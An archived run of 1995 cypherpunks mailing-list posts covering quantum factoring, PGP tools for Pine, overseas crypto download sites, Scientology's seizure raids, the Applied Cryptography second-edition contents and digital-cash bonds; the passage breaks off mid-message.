>is to work on 1024 bit PGP keys? If it works, such keys can 
>be instantly factorized. It would be nice to follow that progress.

It requires molecular precision if it is to work on anything
interesting:  Cracking 1024 bit keys is a long way down the
road.

Long, long, before quantum computers crack 1024 bit keys, many
technological changes will radically and fundamentally change
human existence.

Quantum computers have many potentials far more imminent and
exciting than breaking PGP keys.  (Not that they are all that
imminent.)

Long, long, before quantum computers crack 1024 bit keys, quantum
cryptography will become useful and routine.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sameer R. Manek" <seawolf@challenger.atc.fhda.edu>
Date: Tue, 22 Aug 95 23:19:55 PDT
To: cypherpunks@toad.com
Subject: PGP for pine
In-Reply-To: <199508230536.BAA02012@bb.hks.net>
Message-ID: <Pine.SGI.3.90.950822231652.1318B-100000@challenger.atc.fhda.edu>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of an addon to the Pine mailer that supports PGP? 
the only PGP software i could find required me to first compose a
letter in an editor then run it through a pgp signature program
then finally read it into my favorite mailer.

I'm looking for something that is hopefully transparent, or if not
relatively quick to do.


________________________________________________________________________
Sameer Manek                Seawolf@challenger.atc.fhda.edu         
________________________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Tue, 22 Aug 95 21:47:30 PDT
To: altitude@cic.net (Alex Tang)
Subject: Re: DES & RC4-48 Challenges
In-Reply-To: <199508221656.MAA14641@petrified.cic.net>
Message-ID: <m0sl7ib-001eC5C@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text


Alex Tang wrote:
> 
> On Tue Aug 22 12:26:49 1995: you scribbled...
> > 
> > 
> > [stuff about running crypto screensavers]
> > 
> > It seems like there's got to be an easy way to divvy up keyspace on a
> > real time basis so that anyone with a few cycles to spare can
> > contribute them...
> > 
> > There could be a central server out there, which would keep track of
> > what keyspace needs to be swept, etc.
> 
> It seems that the SKSP protocol is a good foundation for just such a plan.

 > Can screensavers such as After Dark for mac/pc access network protocols?  
> or would someone have to write a new screensaver alltogether.

Afterdark is just a program that always runs in the background. You
could program a screensaver/timeslice stealer...even by modem...

And with Windows new 'features' you can get someone to install this
at the click of a button..from an email message, Ha!....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Wed, 23 Aug 95 01:07:38 PDT
To: "cypherpunks@toad.com>
Subject: Re: (Fwd) 1995 Nanotechnology Conference
Message-ID: <199508230807.BAA25567@utopia.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

On Tuesday, 22-Aug-95 11:00 PM, James A. Donald,
(jamesd@echeque.com) wrote:

>At 11:00 AM 8/21/95 -0800, J. Kent Hastings wrote:
>>Doesn't quantum coherence require molecular precision if it
>>is to work on 1024 bit PGP keys? If it works, such keys can 
>>be instantly factorized. It would be nice to follow that progress.

>It requires molecular precision if it is to work on anything interesting: 
Cracking >1024 bit keys is a long way down the road...[praises other
applications]

Tim says that quantum codebreaking and nanotech ain't gonna happen, 
because of things he explained in the past on the list, now available in 
the archive. I found a great Web version of the cypherpunks archive at http:
//www.hks.net/cpunks/index.html and will indeed catch up on the 
quantum coherence subject.

RSA Data Security printed an article in their newsletter, by one of the 
inventors of working quantum cryptography, which stated that there is 
a risk of cracking RSA because of efficient hardware factorization. Why 
would they make this up about their own product? OK Tim, I'll catch up 
before making further comments on quantum codebreaking. 

Now about nanotech: The Moore(?) scale mentioned here says the 
processing power of hardware capacity doubles every 12 or 18 months for 
a given amount of money. In about 20 years only nanotech will be on the 
curve. Will hardware progress just come to a grinding halt then or what?
What's going on here? I thought cpunx were pro-nanotechnology.

Kent
--
Check out Neil Schulman's new book, http://www.pinsight.com/~zeus/jneil/
J. Kent Hastings -- zeus@pinsight.com -- http://www.pinsight.com/~zeus/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Wed, 23 Aug 95 00:21:07 PDT
To: "Sameer R. Manek" <seawolf@challenger.atc.fhda.edu>
Subject: PGP for pine and other Unix programs
In-Reply-To: <Pine.SGI.3.90.950822231652.1318B-100000@challenger.atc.fhda.edu>
Message-ID: <199508230719.BAA01349@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> Does anyone know of an addon to the Pine mailer that supports PGP? 
> the only PGP software i could find required me to first compose a
> letter in an editor then run it through a pgp signature program
> then finally read it into my favorite mailer.
> 
> I'm looking for something that is hopefully transparent, or if not
> relatively quick to do.


My "Bryce's Auto-PGP" fits the bill.  It is an sh script so it can be
integrated without too much trouble into Pine, Elm, trn, tin, mh, etc etc.  
I have personally tested it with Pine so I know it'll work.  You can e-mail
me for a beta copy, or you can ask for a v1.0 copy if you don't mind waiting
an unspecified amount of time for beta-testing to finish.


Regards,

Bryce

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMDrWWfWZSllhfG25AQEpXQP+ISF5DNtNa/SbceUTPzFkHLO7YFoV01+S
t91Tt488GplyFQrimqbJpRTRtdxNjt4fR7o23F9kbRkPRtD3zQPxi0/jjT29JrNU
Oi0eiteq2FpgAoevMdkfwdsVKupW2fb78jNnz2490JHM/Zr1CvOH+2bwziQ1i8hR
5y48rjUrLTE=
=DQYq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 23 Aug 95 01:17:58 PDT
To: Enzo Michelangeli <enzo@ima.com>
Subject: Re: The sorry state of non-US crypto
Message-ID: <v02120d04ac60a2a26d79@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:24 8/23/95, Enzo Michelangeli wrote:

>Try these URL's:
>
>Italy:   ftp://ftp.dsi.unimi.it/pub/security/crypt/
>UK:      ftp://ftp.ox.ac.uk/pub/crypto/
>Croatia: http://pgp.rasip.fer.hr/
>Germany: ftp://ftp.darmstadt.gmd.de/pub/crypto/

But how is the average non-US web surfer to supposed to find them, if even
I (who at least knows about the various CP sites) can't even locate them
without asking on the list?

[Thanks for the listing, though :-]


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 22 Aug 95 22:40:47 PDT
To: cypherpunks@toad.com
Subject: The sorry state of non-US crypto
Message-ID: <199508230536.BAA02012@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I just spent an hour surfing the various crypto/cypherpunks web sites. In
this hour I did not come across a single non-US site that carried anything
else but PGP. Most non-US sites just carry rants about the evil ITAR, and
a few carry the various international versions of PGP. That's it. I know
that there are several European ftp sites that have other cryptographic
software as well, but I sure as hell can't find them by browsing the web.
One would think that at lest some of the major homepages (Virtual library,
etc) carry links to such sites. Who cares if someone violates ITAR, if
overseas users can't find the exported software?

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDq+LSoZzwIn1bdtAQGfJAF7B/XTP5VHlvTLgVRcrDHGX9kcLOANI7OE
oQbdMFG6K9V7URHL7HV4N7EaAo+TriRp
=Ocb0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Tue, 22 Aug 95 23:54:57 PDT
To: cypherpunks@toad.com
Subject: Re: The sorry state of non-US crypto
Message-ID: <199508230654.XAA20796@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On August 23rd, Lucky Green succintly stated:

 Who cares if someone violates ITAR, if
>overseas users can't find the exported software?

Lucky, all we (I) can do is keep sending them the stuff.
All it takes is just one person to really learn that a
lot of folks are in this. When they do that they don't 
have to be so 'secretive' about their actions.

I just try to remind myself, "I'm just an electronic
envelope maker", that's all. I also like to think I'm
lucky enough to get a job in marketing the stuff.

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 22 Aug 95 23:00:33 PDT
To: cypherpunks@toad.com
Subject: Re: Third World Man
Message-ID: <v02130515ac606c957f85@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:25 8/21/95, Timothy C. May wrote:
>When a certain character in a television show referred to "Third World
>mutants," he was also referring to "your basic brown types." (His words,
>not mine. Ten credits to anyone who can identify the t.v. show and the
>character.)

Archie Bunker? All in the Family (I think is the show title).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: syrinx@c2.org (Syrinx Anonymous Remailer)
Date: Wed, 23 Aug 95 03:07:36 PDT
To: cypherpunks@toad.com
Subject: Let Me Repeat, the Raids Must Be Stopped!  A PROFOUND THREAT TO FREEDOM OF SPEECH ON THE INTERNET
Message-ID: <199508231002.DAA03500@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



PLEASE FORWARD TO ORGANIZATIONS AND INDIVIDUALS SUPPORTING FREEDOM OF SPEECH
ON THE INTERNET AND TO CIVIL LIBERTIES GROUPS.


As many of you may know, the Church of Scientology (CoS), represented by the
Religious Technology Center (RTC), whose primary function is to defend their
copyrights and trade secrets, performed their third raid/seizure today
against an Internet user for alleged copyright infringement.  The prior
two were against Arnie Lerma last week, and Dennis Erlich back in February.

This raid was against FactNet, an organization dedicated to public awareness
of various groups it labels as 'cults', including the Church of Scientology,
and one of its leaders, Larry Wollersheim.

[It is interesting to note that CoS owes $4 million to Larry Wollersheim based
on an award by the courts, and affirmed by the Supreme Court.  CoS has
refused for whatever reason to pay this judgement, and did very questionable
moving of assets out of California to avoid paying.  Wollersheim has currently
deposed the leader of CoS, David Miscavige, to ask him in court what happened
to the assets of the California branch of CoS.  Mr. Miscavige went into hiding
over a year ago and so has not yet been served with this subpoena.]

This raid and seizure is technically allowed under current U.S. civil copyright
law when certain conditions are met.  Congress originally allowed such raids
to deal with copyright infringement involving bootleg material, where seizing
the equipment used to produce the bootleg materials would effectively halt
production until a court could assess the claims of the copyright holder.  I
am not sure if the Constitutionality of this law has been ruled upon, but in
my opinion it oversteps the bounds of the intent of the U.S. Constitution
regarding the bounds of search and seizure.

Congress passed this law allowing seizure (in 1976) well before the advent
of computer networks.  The rationale that CoS used in convincing a judge to
issue a Writ of Seizure is that seizing the computer equipment will halt the
continued duplication of the copyright material, allegedly in violation of the
rights of the copyright owner.  This rationale does not hold any water when
considering the Internet.  Once the material is electronically disseminated
on the Internet, seizing the computer equipment used to disseminate the
material, as well as copies of the material itself, serves no useful purpose
to stop the continued dissemination of the material.  For example, the
perpetrator of the alleged copyright infringement could, if they want to,
simply purchase/rent/use a computer with Internet access, copy the material
from another site on the Internet (which observation shows exists all around
the world regarding the CoS materials), and redisseminate it as before.  The
only effective remedy is a Temporary Restraining Order (TRO) and a lawsuit
against the individual ALLEGED to have infringed on the copyrighted material
in excess of Fair Use.

Thus, these three raids by CoS were clearly unnecessary.  Furthermore,
regarding civil liberties, they are even more troubling.  In all three raids,
the entire computer, related equipment and tapes were seized by CoS for their
erasure of the alleged copyright materials, but without ANY court oversight
which would filter out data which has no relevance to the matter at hand and
which is protected by the right to privacy and other protections.  There may
also be further protection under the Electronic Privacy Act (or whatever it
is called).  A lot of private data from many people, not related to the
alleged copyright infringements, may have been compromised.

Furthermore, these raids serve to stifle Free Speech on the Internet.  In
essence, CoS is saying to the Internet community:

     "If WE feel you are disseminating our copyrighted materials in excess of
      Fair Use (and we will define what Fair Use is), then we will get a Writ
      of Seizure allowed under U.S. copyright law and take away your computer
      BEFORE the court decides on whether you exceeded Fair Use."

And if much later the court determines that the dissemination was done under
Fair Use, then there is no "effective" and "practical" remedy other than
filing a laborious and expensive countersuit, which could drag on for years,
to the detriment of the individual originally accused of copyright
infringement.  CoS knows this, and thus they really don't fear the
consequences if they overstep their bounds in this matter.

And who wants CoS to plaster the Internet and the newsmedia with their
propaganda stating that "Federal Marshalls Seized the Computer of John Doe"?
We all know that the general public may see John Doe as some criminal of
the first order because Federal Marshalls were called in to handle the matter.
This also serves to stifle Free Speech.

Thus, we must call upon Congress and the courts to fix this "loophole"
allowing these unnecessary and, in my opinion, unconstitutional raids/seizures
of computer equipment for alleged *civil* copyright infringement in excess of
Fair Use.  This "loophole" is a clear threat to Freedom of Speech.

I call upon electronic freedom activist organizations, such as EFF, and more
traditional civil liberties organizations, such as the ACLU, to do something
to stop these raids.  I think asking a Federal judge to put a *temporary*
halt on all such raids pending Federal court review on necessity and
constitutional grounds.  In addition, we should call on Congress to amend the
copyright laws to take into the special aspect of computer networks so as to
not allow the trampling of civil liberties that we've seen with the barbaric
CoS raids.

If you agree with me, do forward this to your Congressperson, to anybody you
know involved in civil liberties issues, religious leaders, etc.  Become
aware and concerned.  If you live in the U.S., you could be the next person
raided just for exercising your right to Free Speech.

Thank you for listening.

Jon Noring

****************************************************************************
For more information on the Scientology versus Internet "war", check out
both alt.religion.scientology on Usenet, and the following Web site, which
has links to nearly all Web pages devoted to the Scientology issue:

http://www.cybercom.net/~rnewman/scientology/home.html
****************************************************************************


-- 
OmniMedia              | The Electronic Bookstore.  Come in and browse!  Two
9671 S. 1600 West St.  | locations:  ftp.netcom.com  /pub/Om/OmniMedia/books
South Jordan, UT 84095 | and  ftp.awa.com  /pub/softlock/pc/products/OmniMedia
801-253-4037           | E-book publishing service follows NWU recommendations.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Wed, 23 Aug 95 01:35:50 PDT
To: cypherpunks@toad.com
Subject: MD5 in DOS
Message-ID: <199508230815.DAA29613@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


cpunks,

im looking for a md5 binary that will run on dos.  can anyone give me a pointer?



10x







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Wed, 23 Aug 95 03:28:04 PDT
To: cypherpunks@toad.com
Subject: Applied Cryptography, Second Edition
Message-ID: <199508231027.FAA25650@klondike>
MIME-Version: 1.0
Content-Type: text


The second edition to APPLIED CRYPTOGRAPHY will be published in November.

This is not just a correction, it is a major update.  There are 50% more
words in the second edition.

The second edition will be published in both hardback and paperback.  Wiley
is jacking the price a bit, so I am offering a 15% pre-publication discount.
Details will be forthcoming when I invent them.

Attached is the table of contents.

Bruce

**************************************************************************

APPLIED CRYPTOGRAPHY - SECOND EDITION    
by  Bruce Schneier


Forward by Whitfield Diffie

Preface

Chapter 1:  Foundations
          Terminology; Steganography; Substitution Ciphers and
          Transposition Ciphers; Simple XOR; One-Time Pads; Computer
          Algorithms; Large Numbers

Part I:  Cryptographic Protocols

Chapter 2:  Protocol Building Blocks
          Introduction to Protocols; Communications using Symmetric
          Cryptography; One-Way Functions; One-Way Hash Functions;
          Communications using Public-Key Cryptography; Digital
          Signatures; Digital Signatures with Encryption; Random and
          Pseudo-Random Sequence Generation

Chapter 3:  Basic Protocols
          Key Exchange; Authentication; Authentication and Key
          Exchange; Formal Analysis of Authentication and Key-Exchange
          Protocols; Multiple-Key Public-Key Cryptography; Secret
          Splitting; Secret Sharing; Cryptographic Protection of
          Databases

Chapter 4:  Intermediate Protocols
          Timestamping Services; Subliminal Channel; Undeniable
          Digital Signatures; Designated Confirmer Signatures; Proxy
          Signatures; Group Signatures; Fail-Stop Digital Signatures;
          Computing with Encrypted Data; Bit Commitment; Fair Coin
          Flips; Mental Poker; One-Way Accumulators; All-or-Nothing
          Disclosure of Secrets; Key Escrow

Chapter 5:  Advanced Protocols
          Zero-Knowledge Proofs; Zero-Knowledge Proofs of Identity;
          Blind Signatures; Identity-Based Public-Key Cryptography;
          Oblivious Transfer; Oblivious Signatures; Simultaneous
          Contract Signing; Digital Certified Mail; Simultaneous
          Exchange of Secrets

Chapter 6:  Esoteric Protocols
          Secure Elections; Secure Multiparty Computation; Anonymous
          Message Broadcast; Digital Cash

Part II:  Cryptographic Techniques

Chapter 7:  Key Length
          Symmetric Key Length; Public-Key Key Length; Comparing
          Symmetric and Public-Key Key Length; Birthday Attacks
          against One-Way Hash Functions; How Long Should a Key Be?;
          Caveat Emptor

Chapter 8:  Key Management
          Generating Keys; Nonlinear Keyspaces; Transferring Keys;
          Verifying Keys; Using Keys; Updating Keys; Storing Keys;
          Backup Keys; Compromised Keys; Lifetime of Keys; Destroying
          Keys; Public-Key Key Management

Chapter 9:  Algorithm Types and Modes
          Electronic Codebook Mode; Block Replay; Cipher Block
          Chaining Mode; Stream Ciphers; Self-Synchronizing Stream
          Ciphers; Cipher-Feedback Mode; Synchronous Stream Ciphers;
          Output-Feedback Mode; Counter Mode; Other Block-Cipher
          Modes; Choosing a Cipher Mode; Interleaving; Block Ciphers
          vs. Stream Ciphers

Chapter 10:  Using Algorithms
          Choosing an Algorithm; Public-Key Cryptography vs. Symmetric
          Cryptography; Encrypting Communications Channels; Encrypting
          Data for Storage; Hardware Encryption vs. Software
          Encryption; Compression, Encoding, and Encryption; Detecting
          Encryption; Hiding Ciphertext in Ciphertext; Destroying
          Information

Part III:  Cryptographic Algorithms

Chapter 11:  Mathematical Background
          Information Theory; Complexity Theory; Number Theory;
          Factoring; Prime Number Generation; Discrete Logarithms in a
          Finite Field

Chapter 12:  Data Encryption Standard
          Background; Description of DES; Security of DES; 
          Differential and Linear Cryptanalysis; The Real Design
          Criteria; DES Variants; How Secure is DES Today?

Chapter 13:  Other Block Algorithms
          Lucifer; Madryga; NewDES; FEAL-N; REDOC; Loki; Khufu and
          Khafre; RC2; IDEA; MMB; CA-1.1; Skipjack

Chapter 14:  Still Other Block Algorithms
          GOST; CAST; Blowfish; SAFER K-64; 3-Way; Crab; SXAL8/MBAL;
          RC5; Other Block Algorithms; Theory of Block Cipher Design;
          Using One-Way Hash Functions; Choosing a Block Algorithm

Chapter 15:  Combining Block Algorithms
          Double Encryption; Triple Encryption; Doubling the Block
          Length; Other Multiple Encryption Schemes; CDMF Key
          Shortening; Whitening; Cascading Multiple Block Algorithms;
          Combining Multiple Block Algorithms

Chapter 16:  Pseudo-Random-Sequence Generators and Stream Ciphers
          Linear Congruential Generators; Linear Feedback Shift
          Registers; LFSRs in Software; Design and Analysis of Stream
          Ciphers; Stream Ciphers using LFSRs; A5; Hughes XPD/KPD;
          Nanoteq; Rambutan; Additive Generators; Gifford; Algorithm
          M; PKZIP

Chapter 17:  Other Stream Ciphers and Real Random-Sequence Generators
          RC4; SEAL; Wake; Feedback with Carry Shift Registers; Stream
          Ciphers using FCSRs; Nonlinear Feedback Shift Registers; 
          Other Stream Ciphers; System-Theoretic Approach to Stream
          Cipher Design; Complexity-Theoretic Approach to Stream
          Cipher Design; Other Approaches to Stream Cipher Design;
          Cascading Multiple Stream Ciphers;  Choosing a Stream
          Cipher; Generating Multiple Streams from a Single Pseudo-
          Random Sequence Generator; Real Random-Sequence Generators

Chapter 18:  One-Way Hash Functions
          Background; Snefru; N-HASH; MD4; MD5; MD2; Secure Hash
          Algorithm (SHA); RIPE-MD; Haval; Other One-Way Hash
          Functions; One-Way Hash Functions using Symmetric Block
          Algorithms; Using Public-key Algorithms; Choosing a One-Way
          Hash Function; Message Authentication Codes

Chapter 19:  Public-Key Algorithms
          Background; Knapsack Algorithms; RSA; Pohlig-Hellman; Rabin;
          ElGamal; McEliece; Elliptic Curve Cryptosystems; LUC; Finite
          Automaton Public-Key Cryptosystems

Chapter 20:  Public-Key Digital Signature Algorithms
          Digital Signature Algorithm (DSA); DSA Variants; GOST
          Digital Signature Algorithm; Discrete Logarithm Signature
          Schemes; Ong-Schnorr-Shamir; ESIGN; Cellular Automata; Other
          Public-Key Algorithms

Chapter 21:  Identification Schemes
          Feige-Fiat-Shamir; Guillou-Quisquater; Schnorr; Converting
          Identification Schemes to Signature Schemes

Chapter 22:  Key-Exchange Algorithms
          Diffie-Hellman; Station-to-Station Protocol; Shamir's Three-
          Pass Protocol; COMSET; Encrypted Key Exchange; Fortified Key
          Negotiation; Conference Key Distribution and Secret
          Broadcasting

Chapter 23:  Special Algorithms for Protocols
          Multiple-Key Public-Key Cryptography; Secret Sharing
          Algorithms; Subliminal Channel; Undeniable Digital
          Signatures; Designated Confirmer Signatures; Computing with
          Encrypted Data; Fair Coin Flips; One-Way Accumulators; All-
          or-Nothing Disclosure of Secrets; Fair and Failsafe
          Cryptosystems; Zero-Knowledge Proofs of Knowledge; Blind
          Signatures; Oblivious Transfer; Secure Multiparty
          Computation; Probabilistic Encryption; Quantum Cryptography

Part IV:  The Real World

Chapter 24:  Example Implementations
          IBM Secret-Key Management Protocol; Mitrenet; ISDN; STU-III;
          Kerberos; KryptoKnight; Sesame; IBM Common Cryptographic
          Architecture; ISO Authentication Framework; Privacy-Enhanced
          Mail (PEM); Message Security Protocol; Pretty Good Privacy
          (PGP); Smart Cards; Public-Key Cryptography Standards;
          Universal Electronic Payment System; Clipper; Capstone; AT&T
          Model 3600 Telephone Security Device

Chapter 25:  Politics
          National Security Agency; National Computer Security Center;
          National Institute of Standards and Technology; RSA Data
          Security, Inc.; Public Key Partners; International
          Association for Cryptologic Research; RACE Integrity
          Primitives Evaluation; Conditional Access for Europe;
          ISO/IEC 9979; Professional, Civil Liberties, and Industry
          Groups; Sci.Crypt; Cypherpunks; Patents; U.S. Export Rules;
          Foreign Import and Export of Cryptography; Legal Issues

Afterward by Matt Blaze

Source Code
          DES; LOKI91; IDEA; GOST; Blowfish; 3-Way; RC5; A5; SEAL;
          WAKE

References



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Buzz@static.noise.net (Buzz White)
Date: Thu, 24 Aug 95 22:14:33 PDT
Subject: Re: Article in Time Magazine
In-Reply-To: <199508220416.AA03981@personal.eunet.fi>
Message-ID: <41eg3r$8er@nntp.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


"Kari Laine" <buster@klaine.pp.fi> wrote:


>> How many exported software products might have backdoors,
>> vulnerabilities, and hidden procedures which are harmfull if ever
>> activated?

>I am not saying it is so I am just speculating

>Windows ?

>Microcode of big host systems like the one from IBM?

>Each mainframe comes with a line attached. Customer
>typically don't have the faintest idea what is going on 
>that line. I know one customer who stuck a printer 
>there and though - now we will see ... well he ended
>up with printouts he did not have the faintest idea
>of their context.

>Now does anyone has real evidence of possible
>backdoors?

>Best Regards
>Kari
>Kari Laine          buster@klaine.pp.fi
>LAN Vision Oy       Tel. +358-0-502 1947
>Sinikalliontie 14   Fax  +358-0-524 149
>02630 ESPOO         BBS  +358-0-502 1576/1456
>FINLAND

All the more reason to use Linux or FreeBSD - an OS you have the source for,
on hardware that you can examine.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Wed, 23 Aug 95 05:04:40 PDT
To: cypherpunks@toad.com
Subject: Re: The sorry state of non-US crypto
Message-ID: <199508231214.HAA20793@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


>>Try these URL's:
>>
>>Italy:   ftp://ftp.dsi.unimi.it/pub/security/crypt/
>>UK:      ftp://ftp.ox.ac.uk/pub/crypto/
>>Croatia: http://pgp.rasip.fer.hr/
>>Germany: ftp://ftp.darmstadt.gmd.de/pub/crypto/
>
>But how is the average non-US web surfer to supposed to find them, if even
>I (who at least knows about the various CP sites) can't even locate them
>without asking on the list?

I, for one, am including them on my homepage (which is now accepting ecash
donations :-).

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 23 Aug 95 04:11:57 PDT
To: cypherpunks@toad.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <v02120d04ac60b6165a45@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 AM 8/23/95, Steven Weller wrote:
>In such a system, where does credit come in? If I have a certificate that
>is worth X, then does the recipient know that it's from my "credit card"?
>How do I obtain credit, and in what form does it exist?

You have follow me through the looking glass a little bit here, but
remember that we're talking about a world where microprocessors and
bandwidth are everywhere.  The compute cycles and the bandwidth have to be
available for this stuff, but given those, it's easy to see how this works.

To replicate a credit card in a certificate bassed scenario, you issue a
bond, just like the old days. (Remember that Babylonian clay thingy with
"J. Nebbuchanezzar"'s seal on it for three cows?) A bond is a certificate
with your signature saying that you'll pay a certain amount of money on a
certain date, or that you owe a certain amount of money, and will pay
interest at a certain rate to the bearer on a certain schedule, and
principal on a certain date, *or* you could issue a bond with coupons that
could be sent in to collect the interest.

This is what a bank does with a credit card, only the transactions with you
are book entries, and nowadays, the bank even lumps your credit card debt
with others and then "securitize" them by selling bonds collateralized with
that debt on the open market.

Now the issuing of personal bonds instead of a book entry credit card work
the same way, in that someone has to actually give you the money, and it
may be unlikely that a store knows your reputation.  It could be that a
bank gives you a guarantee, a certificate, to buy your debt up to a certain
amount, and that makes your bonds instantly tradable on the market.  The
store could then sell your bond to the bank, or to the open market,
depending on where the price is highest.  With enough processing power and
bandwidth, it could resold while you're walking out the door with your
purchase.

>
>Furthermore, how do we assess the value of real physical things in a system
>like this?

"The price of anything is the foregone alternative." (Walter Johnson)
Snappy comebacks aside, the price of something, physical or not, has
nothing do to with its method of purchase, excluding transaction costs,
which for both book entry and certificate economies is measured in
processing and bandwidth costs. You advertise your house for a certain
price, I pay you the price in digital cash, you give me the deed to the
house. QED.

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 23 Aug 95 05:37:44 PDT
To: cypherpunks@toad.com
Subject: NYS_ize
Message-ID: <199508231237.IAA18677@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-23-95. NYPaper:


   "Cyberspace Prophets Discuss Their 'Revolution' Face to
   Face."

      Supporters of Newt Gingrich gathered at a conference
      with the savants of cyberspace to create a common vision
      for America's future in the digital age. Conservative
      venture capitalists and self-proclaimed former hippies
      and anarchists all seemed to agree that America is
      entering an "information revolution" that will
      profoundly restructure the political, economic and
      social landscape. Discussion among the panelists was
      heavy on theory and often long on egoo.


   "Checks Delivered Via E-Mail Are Planned."

      A group of banks and technology companies said yesterday
      that they would design a system to create "electronic
      checks" that could be used to make payments over the
      Internet or other electronic mail systems. Unlike the
      electronic bill-payment services increasingly offered by
      banks, electronic checks could be sent directly by
      customers to their recipients, without going through the
      bank. The electronic check would contain all the
      information that is on today's paper checks. In
      addition, the check would contain a "digital signature,"
      a security code that could prove that the check was
      authorized by the account holder.


   Lion to ewe: NYS_ize (13kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 23 Aug 95 09:18:12 PDT
To: cypherpunks@toad.com
Subject: Re: (Fwd) 1995 Nanotechnology Conference
Message-ID: <ac60a09d2802100493a5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:00 AM 8/23/95, J. Kent Hastings wrote:

>Tim says that quantum codebreaking and nanotech ain't gonna happen,
>because of things he explained in the past on the list, now available in
>the archive. I found a great Web version of the cypherpunks archive at http:
>//www.hks.net/cpunks/index.html and will indeed catch up on the
>quantum coherence subject.

I didn't mean to sound so dismissive, just that we've been around and
